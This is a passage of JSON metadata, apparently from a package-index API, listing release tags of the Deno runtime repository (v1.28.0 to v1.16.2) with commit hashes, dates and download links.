yste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f